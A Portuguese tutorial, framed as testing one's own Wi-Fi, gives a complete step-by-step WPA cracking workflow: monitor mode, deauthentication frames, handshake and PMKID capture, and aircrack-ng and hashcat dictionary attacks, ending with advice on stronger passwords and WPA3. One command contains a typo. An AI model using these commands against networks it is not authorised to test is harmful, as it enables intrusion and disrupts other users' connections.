Wifi Attack
Guia Prático: Testando a Segurança do Seu Wi-Fi no Ubuntu¶
1. Instalar Ferramentas Necessárias¶
sudo apt update
sudo apt install aircrack-ng crunch
2. Identificar e Ativar Modo Monitor¶
Veja suas interfaces Wi-Fi:¶
sudo airmon-ng
Ative o modo monitor (troque wlan0 pelo nome da sua interface):¶
sudo airmon-ng start wlan0
Confirme se entrou em modo monitor:¶
iwconfig
Você deve ver Mode: Monitor para a interface.
3. Escanear Redes Wi-Fi¶
troque wlan0 pelo nome da sua interface e adicione mon no final:¶
sudo airodump-ng wlan0mon
- Anote:
- BSSID → MAC do seu roteador
- CH → Canal usado
- ESSID → Nome da rede
Pressione CTRL+C para parar.
4. Capturar Handshake¶
Troque [CANAL] e [BSSID] pelos dados da sua rede:¶
sudo airodump-ng -c [CANAL] --bssid [BSSID] -w captura lan0mon
Deixe rodando. Agora vamos gerar tráfego para forçar um cliente a se reconectar:
Em outro terminal:¶
sudo aireplay-ng --deauth 5 -a [BSSID] wlan0mon
Quando o airodump-ng mostrar WPA handshake no topo da tela, você pode parar com CTRL+C.
Isso vai gerar um arquivo captura-01.cap.
Capturar Handshake com PMKID + Hashcat¶
Caso não tenha a ferramenta instalada:¶
sudo apt install hashcat hcxdumptool hcxpcapngtool
# Use o hcxdumptool para pedir PMKID ao roteador:¶
sudo hcxdumptool -i wlan0mon -o captura.pcapng --enable_status=1
- Deixe rodar por 30–60s para garantir que capture o PMKID.
- Depois pressione CTRL+C para parar.
Transforme o arquivo .pcapng em hash compatível:¶
hcxpcapngtool -o hash.22000 captura.pcapng
Se der certo, você verá algo como:¶
Written 1 PMKID(s) to hash.22000
5. Quebrar a Senha¶
Use uma wordlist. O Kali vem com a famosa rockyou.txt, mas no Ubuntu você pode baixá-la:¶
sudo apt install wordlists
Depois rode:¶
aircrack-ng captura-01.cap -w /usr/share/wordlists/rockyou.txt
Se a senha estiver na lista, ele vai exibir algo assim: KEY FOUND! [ MinhaSenha123 ]
Quebrar senha com hashcat:¶
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt
Interpretar resultado¶
Se encontrar a senha, Hashcat vai mostrar no terminal algo como:¶
<hash> : minha_senha_encontrada
Se não encontrar, você pode tentar:
- Criar wordlist personalizada com crunch.
- Usar regras diferentes.
- Testar ataques híbridos (hashcat ... ?d?d?d para números no final).
6. (Opcional) Criar Sua Própria Wordlist¶
Se quiser gerar combinações específicas, use crunch.
Exemplo: gerar senhas de 8 a 10 caracteres com letras e números:¶
crunch 8 10 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 -o minha-wordlist.txt
E depois usar no aircrack-ng:¶
aircrack-ng captura-01.cap -w minha-wordlist.txt
Após o Teste¶
Se você conseguiu quebrar sua senha rapidamente: - Troque para uma senha mais longa e complexa (12+ caracteres). - Desative WPS no roteador. - Use WPA2-AES ou WPA3.